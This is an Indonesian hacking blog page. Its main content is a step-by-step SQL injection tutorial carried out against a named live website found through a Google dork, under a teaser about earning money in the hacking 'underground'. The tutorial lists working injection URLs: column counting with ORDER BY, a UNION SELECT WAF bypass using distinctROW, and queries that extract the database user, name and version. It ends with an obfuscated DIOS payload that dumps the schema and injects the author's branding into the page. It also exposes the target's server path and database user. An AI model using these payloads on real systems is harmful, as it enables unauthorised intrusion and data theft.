Langsung ke konten utama

Unggulan

Bagaiamana-seorang-peretas-mendapatkan-penghasilan-PART-1

 Bagaiamana-seorang-peretas-mendapatkan-penghasilan-PART-1 Sumber: pexels.com H ai Teman teman kembali lagi nih di blog gudang SQL masih sama dengan saya razan (uchiha obITo) selaku penulis. Disini penulis akan share saja beberapa tips atau sebuah cara mencari penghasilan di ranah underground. 1. Apa itu underground? Apa itu underground??, Underground adalah sebutan atau istilah dari dunia hacking/cyber. Salah satu narasumber kami Mr.404CYBER menuturkan dengan singkat apa itu dunia under ground lihat gambar dibawah ini : 2. Resiko berbisnis Backdoor / dunia cyber/ underground Okey lanjut, sambil membahas soal penghasilan, kita penasaran kan sang narasumber ini, latar belakangnya apa, Dan bagaimana bisa ? Dia kami pilih selaku narasumber?. Next keep baca ya guys 😎. Setiap bisnis pasti punya resikonya ya teman teman.. Yang penulis bahas dalam resiko ini adalah, resiko terjadi adanya penipuan atau RIPPER. Apa itu RIPPER?, Ripper adalah seorang pelaku yang berniat untuk menipu ketika ...

Tutorial SQL Injection part 1 (dbms MySQL)

 



Halo guys kembali di situs uchiha obITo

Masih seputar SQL Injection

Kalian perlu 2 aplikasi ini guys :

1. Web browser + google

2. SQLMAP (CLI) (opsional)

3. DH Hackbar (GUI) (opsional)

Okey seperti biasa saya sudah ada live target, dan saya akan menjelaskan mulai dari 0 yah :)

Step Pertama :

1. Siapkan Dork SQL Injection, apa itu dork?

klik disini

2. Oke sebagai contoh disini saya pakai dork

   "inurl:product.php?id= site:.in". Dan kalian harus tau, untuk menggunakan dork hanya bisa dilakukan pada search engine Google.

3. ini live target (sasaran) :https://ensis.in/product.php?prid=62

Tampilannya seperti ini gengs 

Page masih terlihat normal kan?
Okey lanjutkan.

3. Step ketiga kita cek pakai char ya, ('), (")
    dan (*). Apakah akan terjadi error?
contoh : https://ensis.in/product.php?prid=62'

  



Terjadi error ya guys muncul pesan seperti ini " Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /home/dhipltbr/ensis.in/product.php on line 9


Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /home/dhipltbr/ensis.in/product.php on line 11


Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /home/dhipltbr/ensis.in/product.php on line 13".


4. Step ke empat yaitu kita test lagi situs tersebut dengan url balancing (--+-,--,'--+-) contoh : https://ensis.in/product.php?prid=62'--+-


Kalau page kembali normal seperti dibawah bisa dipastikan vuln SQL injection ya guys ya 😂.



Selanjutnya..

5. Step kelima yaitu mencari jumlah column atau error based (nanti kita bahas ini ya di sini ), kita pakai order by

Contoh : https://ensis.in/product.php?prid=62'+order+by+1--+-

Page normal kembali ya karena 1 itu dasar dari sebuah jumlah column tersebut. Lihat gambar dibawah

page kembali normal ya, nah kita test lagi terus menerus hingga page tersebut error'

Contoh : 

https://ensis.in/product.php?prid=62+order+by+1--+- (page normal)


https://ensis.in/product.php?prid=62+order+by+2--+-(page normal)


https://ensis.in/product.php?prid=62+order+by+3--+-(page normal)


https://ensis.in/product.php?prid=62+order+by+4--+- (page normal)


https://ensis.in/product.php?prid=62+order+by+5--+- (page normal)


https://ensis.in/product.php?prid=62+order+by+6--+- (page normal)


https://ensis.in/product.php?prid=62+order+by+7--+- (page normal)


https://ensis.in/product.php?prid=62+order+by+8--+- (page error')


Nah, sekarang kita udah tau ya, ternyata di kolom ke delapan 8 terjadi error yang artinya kolom tersebut hanya mencapai 7.


6. Step keenam yaitu kita mencoba union select statement (+union+select+).

contoh : https://ensis.in/product.php?prid=.62'+union+select+1,2,3,4,5,6,7--+-

Kalian teliti ya ikuti contohnya okey

Nah tampil page seperti ini forbidden

Jangan khawatir, ini bisa kita bypass kok berdasarkan owasp.org disini kita bisa membypassnya dengan distinctROW.

Contoh : https://ensis.in/product.php?prid=.62'+union+distinctROW+select+1,2,3,4,5,6,7--+-


Nanti muncul page error' seperti dibawah ini, 


Lah?! Bang Tobi!!. Kok ga muncul angka togelnya??, Tenang ternyata angka togelnya itu berupa url gambar tersebut coba deh kamu tekan lama gambar yang error' tersebut ntar seperti dibawah ini :



ada angka apa aja?, Ada 3, 2, dan 4 yah.

Kamu bisa pilih salah satu aja.

Semisal aku mau pilih nomor 3 ya siapa tau jadi presiden yang adil wkwk.

Contoh : https://ensis.in/product.php?prid=.62'+union+distinctROW+select+1,2,user(),4,5,6,7--+-

nanti muncul seperti gambar dibawah ini nih kalau ditekan lama.


Nah ada tulisan localhost gitu kan?
ensis_ensis@localhost
Nah itu teh, ngaranna user database nya guys. user() itu variabel injeksi supaya bisa menampilkan user database nya.

7. Step ketujuh yaitu menggunakan concat jadi concat ini tuh berfungsi sebagai menampilkan variabel injeksi yang lebih dari 1, biasanya di beberapa situs ada yang memforbidden kan. Tapi di situs ini nampaknya tidak okeh kita langsung aja pakai concat yah.

contoh : https://ensis.in/product.php?prid=.62'+union+distinctROW+select+1,2,concat(user(),database()),4,5,6,7--+-

penggunaan nya concat('argumen1', 'argumen2') dst tanpa tanda petik.

Seperti gambar dibawah ini

Nah, disitu ada nama user database nya dan ada nama database nya ya guys.

Sekarang kita pakai DIOS (Dump In One Shoot) artinya Dump kedalam satu tembakan.

Contoh : https://ensis.in/product.php?prid=.62%27%20union%20distinctROW%20select%201,2,concat(%27%22%3E%3C/a%3E%3C/div%3E%27,%27%3Ch4%3ESQL%20Injection%20by%20uchiha%20obITo%3C/h4%3E%3Cbr%3E%3Cimg%20src=http://www.razancode.my.id/img/fotoku.jpg%20width=150%3E%3Cbr%3E%3Cbr%3Enama%20user[:!:]%27,user(),%27%3Cbr%3E%27,%27nama%20database[:!:]%27,database(),%27%3Cbr%3E%27,%27versi%20dan%20tipe[:!:]%27,version(),%27%3Cbr%3E%27,%27=========================%3Cbr%3E%27,(select+concat((select(@x)/*!50000from/**~uchiha_obITo**/*/(/*!50000select/**~uchiha_obITo**/*/(@x:=0x00),(select(0)/*!From/**~uchiha_obITo**/*/(/*!50000information_schema.columns/**~uchiha_obITo**/*/)/*!50000where/**~uchiha_obITo**/*/(table_schema=database/*data*//**~uchiha_obITo*/())and(0x00)in(@x:=/*!50000coNcat/**~uchiha_obITo**/*/(@x,0x3c6c693e,0x3c666f6e7420636f6c6f723d7265643e,/*!50000table_name/**uchiha_obITo**/*/,0x3c2f666f6e743e,0x3a3a,/*!50000column_name/**~uchiha_obITo**/*/))))x))),%27%3Ca%3E%27),4,5,6,7--+-

Hasilnya :




Oke sekian dari uchiha obITo, selamat belajar ya.. ^_^




Hanya Pelajar IT
channel



























Komentar

Disarankan untuk anda